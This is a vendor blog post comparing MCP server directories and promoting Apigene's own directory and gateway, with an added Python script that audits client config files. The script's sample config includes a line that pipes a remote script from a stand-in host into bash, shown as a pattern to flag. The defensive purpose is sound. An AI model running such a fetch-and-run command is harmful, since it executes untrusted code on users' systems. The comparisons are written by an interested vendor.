MCP Marketplace Guide: Find the Right Server (2026)

Apigene Team

"Funny how there are actually gazillion of MCP registries in the wild. At this point every developer is going to have its own."

That Reddit comment captures the state of MCP server discovery in 2026. There are at least a dozen active MCP marketplace platforms, directories, and registries competing for attention. Some track 8,000+ entries. Others curate 30 verified ones. A few charge for API access. Most are free but give you zero information about whether a server is safe, maintained, or compatible with your client.

The result: developers burn hours hunting through GitHub repos, Discord channels, and competing directories to find a single server that works. One developer said it directly: "Flipping thru github issues and discords for basic install commands. Sucked up hours."

This guide compares every major MCP marketplace, explains what separates a useful MCP directory from a search engine over GitHub, and helps you pick the right one. The best directory isn't the biggest one. It's the one that tells you which servers are safe to install and makes installation painless.

We analyzed 15 community threads with 200+ comments to identify what developers actually want from an MCP marketplace and where every current option falls short.

Key Takeaways

For busy teams evaluating MCP directories, here's what 15 community threads revealed:

  • Discovery is scattered across 10+ sources. Servers get published on npm, PyPI, GitHub, and multiple competing registries. No single MCP marketplace has everything.
  • Quantity without quality is useless. A directory listing 8,000 servers is only valuable if it tells you which ones are safe, maintained, and compatible with your client.
  • Security scanning is the top differentiator. 36.7% of public MCP servers have SSRF vulnerabilities. Directories that scan for this win trust. Directories that don't are just search engines over GitHub.
  • One-click install beats a bigger catalog. Developers consistently cite setup friction as the reason they abandon servers. The best MCP directory platforms pair listing with installation.

Why MCP Discovery Is Broken

The MCP ecosystem doesn't have a single canonical MCP marketplace. Servers get published across:

  • The official MCP Registry (registry.modelcontextprotocol.io)
  • npm and PyPI (JavaScript and Python package managers)
  • GitHub topics and awesome-lists (community-curated collections)
  • Dedicated directories (Apigene, Smithery, Glama, PulseMCP, mcp.so, mcpservers.org)
  • Product Hunt and Reddit (launch announcements and threads)

One developer built mcp-submit, a CLI that pushes your server to 10+ directories in a single command, because they were "tired of manually submitting to 10+ MCP directories every time I shipped a server." The fact that this tool exists tells you everything about how fragmented discovery is.

For consumers, this fragmentation creates three problems:

  1. You never know if you've found the best option. The same capability (web search, database access, file management) might have 5 different implementations across 3 different registries. An MCP store listing doesn't tell you which one is actually production-ready.
  2. Quality signals are missing. Most directories list servers without telling you if they're maintained, secure, or compatible with your client.
  3. Installation friction kills discovery. Finding a server is only half the battle. Getting it running with your specific client (Claude Desktop, Cursor, ChatGPT) requires digging through READMEs for config JSON that may or may not work.

What Makes an MCP Directory Actually Useful

Before comparing specific platforms, here's what the community says they want from an MCP marketplace. These criteria come directly from 15 threads of developer feedback:

Security Signals

This is the #1 ask. A scan of 8,000+ MCP servers revealed that 36.7% had SSRF vulnerabilities, 43% had unsafe command execution paths, and 41% of servers in the official registry had zero authentication. One developer warned: "the permission model is basically 'do you trust this server yes or no'. There's no sandboxing, no audit trail."

A useful MCP directory needs to tell you:

  • Has the server been security-scanned?
  • What vulnerabilities were found (if any)?
  • Does it require auth? What kind?
  • What permissions does it request?

Stop Building MCP Integrations From Scratch.

  • Any API, one line of code — connect to ChatGPT, Claude, and Cursor without writing custom MCP servers
  • Visual UI in the chat — render interactive components, not just text dumps. Charts, forms, dashboards.
  • 70% fewer tokens — dynamic tool loading and output compression so your agents stay fast and cheap

Verification and Trust

The "multiple versions of the same tool" problem is real. Community members recommend sticking with "official ones" because forks and variants can introduce malicious changes. A useful MCP store verifies who published the server and whether the listing matches the actual codebase.

One thread's advice: "Treat any MCP marketplace like npm: only install from repos you trust and run it in a sandbox first."

Installation Readiness

Developers consistently rank "one-click install" as a deciding factor. The pain isn't just discovering a server. It's the gap between "found it" and "running it." A developer building an MCP directory put it this way: "No one is going to install random scripts anymore." Useful directories provide ready-to-paste configs for Claude Desktop, Cursor, VS Code, and other clients.

Quality and Freshness

Community feedback says directories need to surface:

  • Maintenance status (last commit date, issue response time)
  • Production readiness (works under load, has containerization)
  • Cold start performance (pip/npm downloads during startup)
  • Client compatibility matrix (which clients has it been tested with)

Without these signals, a directory is just "a search engine over GitHub," as one commenter put it.

MCP Marketplace Comparison

Here's how every major MCP marketplace and MCP directory stacks up as of March 2026.

Apigene MCP Directory

URL: apigene.ai/mcp/official

Listings: 251+ vendor-verified MCP servers

Key differentiators:

  • Security scanning. Every server is scanned against OWASP MCP guidelines. Vulnerability reports and security metadata are surfaced per listing. This is the feature that most other directories lack entirely.
  • Vendor verification. Servers are verified by the vendor or maintainer, not just scraped from a registry. This eliminates the "multiple versions of the same tool" confusion that plagues open registries.
  • One-click installation. Each server page includes ready-to-paste configuration for Claude Desktop, Cursor, VS Code, and other clients. No digging through READMEs.
  • Gateway integration. Servers install through Apigene's MCP gateway, which handles auth, transport translation, and credential isolation. You're not just discovering servers. You're deploying them safely.
  • Categorized browsing. Servers are organized by use case (dev tools, databases, productivity, CRM) with clear descriptions of what each one does.

Best for: Teams that want a curated, security-first MCP directory with install-ready configs. If you care more about quality than quantity, start here.

Smithery

URL: smithery.ai

Listings: 2,000+ servers

Key differentiators:

  • Large catalog scraped from multiple sources
  • Hosted server execution (runs servers for you)
  • Config generation for popular clients
  • SDK and CLI for programmatic server installation

Limitations:

  • Community reports of confusing duplicate listings
  • Multiple versions of the same server without clear guidance on which to pick
  • Limited security metadata per listing

Best for: Developers who want a broad catalog and don't mind doing their own security evaluation.

Glama

URL: glama.ai/mcp

Listings: 6,000+ servers

Key differentiators:

  • Free API for programmatic server browsing (the founder explicitly committed: "100% free and will remain this way")
  • Gateway product alongside the directory
  • Active community contributions

Limitations:

  • Quantity-focused. Discovery is harder when you're searching through thousands of unranked entries.
  • Limited per-server security data

Best for: Developers who want API access to browse servers programmatically or build custom discovery tools.

PulseMCP

URL: pulsemcp.com

Listings: 3,000+ servers

Key differentiators:

  • Focus on trending and newly published servers
  • Community engagement metrics
  • Regular roundup content

Limitations:

  • Less focus on security scanning
  • Discovery skews toward recency over production readiness

Best for: Keeping up with newly released servers and tracking community trends.

mcp.so

URL: mcp.so

Listings: 5,000+ servers

Key differentiators:

  • Clean, searchable interface
  • Category-based browsing
  • Active curation team

Limitations:

  • Primarily a listing platform without install automation
  • Limited security or quality signals per entry

Best for: Quick browsing when you know roughly what you're looking for.

mcpservers.org

URL: mcpservers.org

Listings: 4,000+ servers

Key differentiators:

  • Aggregates from npm, PyPI, and GitHub
  • Rankings based on popularity metrics
  • Free access

Limitations:

  • Popularity metrics can be gamed
  • Limited verification of listed servers

Best for: Finding popular servers based on community adoption metrics.

Official MCP Registry

URL: registry.modelcontextprotocol.io

Listings: 500+ servers

Key differentiators:

  • Maintained by the MCP project itself
  • Structured metadata (tools, clients, authors)
  • Canonical source for "official" servers

Limitations:

  • Smaller catalog than community directories
  • No security scanning
  • Limited install tooling
  • A community audit found 41% of listed servers have zero authentication

Best for: Finding servers that have been submitted through the official process. Good starting point, but don't assume "official registry" means "security vetted."

Cline MCP Marketplace

URL: Available within the Cline VS Code extension

Listings: Curated selection

Key differentiators:

  • Built directly into the Cline editor
  • Install without leaving your IDE
  • Curated for Cline compatibility

Limitations:

  • Only accessible through Cline
  • Limited to servers that work with Cline's configuration model

Best for: Cline users who want frictionless in-editor installation.

MCPMarket

URL: mcpmarket.com

Listings: 1,900+ servers

Key differentiators:

  • Security scanning for data exfiltration, obfuscated code, and excessive permissions
  • One-click install configs for multiple clients
  • Community reviews and ratings

Limitations:

  • Newer platform, still building trust
  • Smaller community than Smithery or Glama

Best for: Developers who prioritize security scanning but want a broader catalog than Apigene.

Expert Tip -- Yaniv Shani, Founder of Apigene

"An MCP marketplace that just lists servers is solving yesterday's problem. The real challenge isn't finding a server. It's knowing if it's safe, knowing it works with your client, and getting it running in 30 seconds instead of 30 minutes. That's why we built the Apigene directory as a gateway-integrated experience. You don't just discover servers. You deploy them with security, auth, and transport handled from the start."

MCP Marketplace Comparison Table

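| Feature | Apigene | Smithery | Glama | mcp.so | mcpservers.org | Official Registry |
|---|---|---|---|---|---|---|
| Listings | 251+ verified | 2,000+ | 6,000+ | 5,000+ | 4,000+ | 500+ |
| Security scanning | Yes (OWASP) | Limited | Limited | No | No | No |
| Vendor verification | Yes | No | No | No | No | Submission review |
| One-click install | Yes | Yes | No | No | No | No |
| Gateway integration | Yes | Hosted execution | Yes | No | No | No |
| Free API | Yes | Paid tiers | Yes (free forever) | No | No | No |
| Client configs | All major clients | Select clients | Limited | No | No | No |
| Category browsing | Yes | Yes | Yes | Yes | Yes | Limited |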

How to Evaluate Any MCP Marketplace

Regardless of which MCP directory you use, apply this evaluation framework before installing any server:

Step 1: Check Security Signals

Look for OWASP MCP compliance, vulnerability scan results, and auth requirements. If the directory doesn't show this data, check the server's GitHub repo for security docs. If there aren't any, proceed with extreme caution.

The MCP marketplace security landscape is sobering: 36.7% SSRF rate, 43% unsafe command execution, 9.2% critical findings. Don't assume "listed" means "safe."

Step 2: Verify the Publisher

Check if the server is published by the official vendor (like Stripe for the Stripe MCP server) or by a community contributor. Multiple forks of the same server can have very different security postures. Community advice: stick with official or well-starred forks.

Step 3: Check Maintenance

When was the last commit? Are issues being addressed? Is there a Docker image? One directory maintainer noted: "It's shocking how few people put effort into documentation and containerization. No one is going to install random scripts anymore."

Step 4: Test Client Compatibility

Not every server works with every client. Claude Desktop uses stdio, ChatGPT requires OAuth 2.1, and Cursor has its own config format. A good MCP store tells you which clients the server supports. If it doesn't, you'll find out through trial and error.

Step 5: Sandbox First

Treat any MCP marketplace like npm. Run the server in an isolated environment before giving it access to production credentials. Check what network calls it makes. Check what file system access it requests.
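
One way to apply Steps 2 and 5 to a config copied from a directory listing before it reaches a client, shown as an added example that is not from the original article or any directory's tooling. It assumes the `mcpServers` layout (`command`, `args`, `env`, and `url` for remote servers) used by client config files; the finding labels, server names, packages and values are constructed for illustration.

```python
import json
import re

# Constructed sample in the "mcpServers" layout of claude_desktop_config.json /
# .cursor/mcp.json; every server name, package and value here is made up.
SAMPLE_CONFIG = json.loads("""
{
  "mcpServers": {
    "pinned-ok": {
      "command": "npx",
      "args": ["-y", "@example/mcp-files@1.4.2", "/home/dev/sandbox"]
    },
    "unpinned": {
      "command": "npx",
      "args": ["-y", "example-mcp-search"],
      "env": {"SEARCH_API_KEY": "constructed-placeholder"}
    },
    "shell-wrapped": {
      "command": "bash",
      "args": ["-c", "curl -s https://example.invalid/run.sh | sh"]
    },
    "remote-plain": {"url": "http://mcp.example.invalid/sse"}
  }
}
""")

SHELLS = {"sh", "bash", "zsh", "cmd", "cmd.exe", "powershell", "pwsh"}
RUNNERS = {"npx", "uvx"}  # launchers that fetch a package at start-up
PINNED = re.compile(r"^(@[^/@]+/)?[^@]+@\d+\.\d+\.\d+")  # name@x.y.z
SECRET_NAME = re.compile(r"KEY|TOKEN|SECRET|PASSWORD", re.I)
BROAD_PATHS = {"/", "~", "C:\\"}

def audit_server(entry):
    """Return hypothetical finding labels for one server entry."""
    findings = []
    command = entry.get("command", "").rsplit("/", 1)[-1]
    args = entry.get("args", [])
    if command in SHELLS:  # arbitrary shell string instead of a reviewable package
        findings.append("shell-wrapper")
    if command in RUNNERS:
        package = next((a for a in args if not a.startswith("-")), None)
        if package and not PINNED.match(package):  # floats to whatever is latest
            findings.append("unpinned-package")
    if any(a in BROAD_PATHS for a in args):  # whole disk or home directory exposed
        findings.append("broad-filesystem-path")
    for name, value in entry.get("env", {}).items():
        if SECRET_NAME.search(name) and value:  # credential handed over before sandboxing
            findings.append(f"inline-secret:{name}")
    if entry.get("url", "").lower().startswith("http://"):
        findings.append("cleartext-remote-url")
    return findings

def audit_config(config):
    """Map each server name to its findings (empty list means nothing flagged)."""
    return {name: audit_server(e) for name, e in config.get("mcpServers", {}).items()}

if __name__ == "__main__":
    for server, found in audit_config(SAMPLE_CONFIG).items():
        print(f"{server}: {', '.join(found) or 'no findings'}")
```

An empty result only means none of these patterns matched; the server still needs to run in an isolated environment, with its network calls and file access observed, before it gets real credentials.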

The Directory Fatigue Problem

One of the clearest signals from our research is that developers are tired of MCP marketplace proliferation. "Building a marketplace for this is low hanging fruit... way too oversaturated right now," said one commenter. Another asked why they should use a dedicated directory when they could "ask Claude to do the work to pick one for me."

This fatigue is driving a few trends:

  1. Consolidation toward gateways. Developers increasingly want their MCP directory and their MCP deployment infrastructure in one place. Finding a server in one tab and configuring it in another is friction nobody wants.
  2. Agent-driven discovery. Some directories are building MCP server endpoints for their own catalogs, so AI agents can discover other servers programmatically. The Meyhem project indexed 7,500+ servers and exposed them as an MCP tool.
  3. CI/CD integration. Developers want to chain directory submissions into their release pipeline. Tools like mcp-submit automate publishing to 10+ directories from a single command.

The winners in this space will be the directories that go beyond listing. Discovery is a solved problem. Trust, security, and frictionless deployment are not.

How a Gateway Changes the Discovery Experience

The Apigene MCP gateway connects the MCP directory to the deployment layer. Here's what that means in practice:

  • Browse the directory, click install, and the server is live. No config files to edit, no JSON to paste, no environment variables to set.
  • Security is handled at the gateway layer. Even if an individual server has weak auth, the gateway enforces credential isolation, outbound URL restrictions, and tool-level access controls.
  • Transport is abstracted. You don't need to know if a server uses stdio, SSE, or Streamable HTTP. The gateway translates for your client automatically.
  • Updates flow through the gateway. When a server updates, you get the new version without reconfiguring. No more checking GitHub for breaking changes.

This approach addresses the community's #1 complaint: the gap between "found a server" and "server is running safely in my workflow." The best MCP marketplace is the one that closes that gap entirely.

Frequently Asked Questions

What is an MCP marketplace?

An MCP marketplace is a directory or platform where developers can discover, evaluate, and install MCP (Model Context Protocol) servers. These servers let AI agents connect to external tools like GitHub, Stripe, Slack, and databases. Marketplaces range from simple lists (like awesome-mcp-servers on GitHub) to full platforms with security scanning, verification, and one-click install (like Apigene).

Which MCP marketplace has the most servers?

Glama leads with 6,000+ listings, followed by mcp.so (5,000+), mcpservers.org (4,000+), and Smithery (2,000+). But quantity doesn't equal quality. Security scans of 8,000+ servers found that over a third have SSRF vulnerabilities. The Apigene directory takes a different approach with 251+ vendor-verified servers, each security-scanned against OWASP guidelines.

Are MCP servers from marketplaces safe to install?

Not automatically. A scan of 8,000+ public MCP servers found 36.7% had SSRF vulnerabilities, 43% had unsafe command execution paths, and 41% in the official registry had zero authentication. Always check for security scanning data, verify the publisher, and sandbox new servers before giving them production credentials. Directories with security scanning like Apigene reduce this risk significantly.

How do I install an MCP server from a marketplace?

It depends on the marketplace. Most require you to copy JSON configuration and paste it into your client's config file (claude_desktop_config.json for Claude Desktop, .cursor/mcp.json for Cursor). Platforms like Apigene offer one-click install that handles configuration automatically through their gateway. Some directories like Smithery also offer hosted execution.

What's the difference between the official MCP Registry and other marketplaces?

The official MCP Registry (registry.modelcontextprotocol.io) is maintained by the MCP project and lists ~500 servers that have been submitted through their process. Other marketplaces aggregate from the registry plus npm, PyPI, GitHub, and community sources. The official registry has basic submission review but no security scanning. Community marketplaces vary widely in their verification and security practices.

Can I submit my own MCP server to marketplaces?

Yes. Most marketplaces accept community submissions. The official MCP Registry accepts PRs. Smithery, Glama, and others have submission forms. If you want to submit to multiple directories at once, the open-source tool mcp-submit automates the process for 10+ directories in a single command. For the Apigene directory, servers go through a vendor verification process.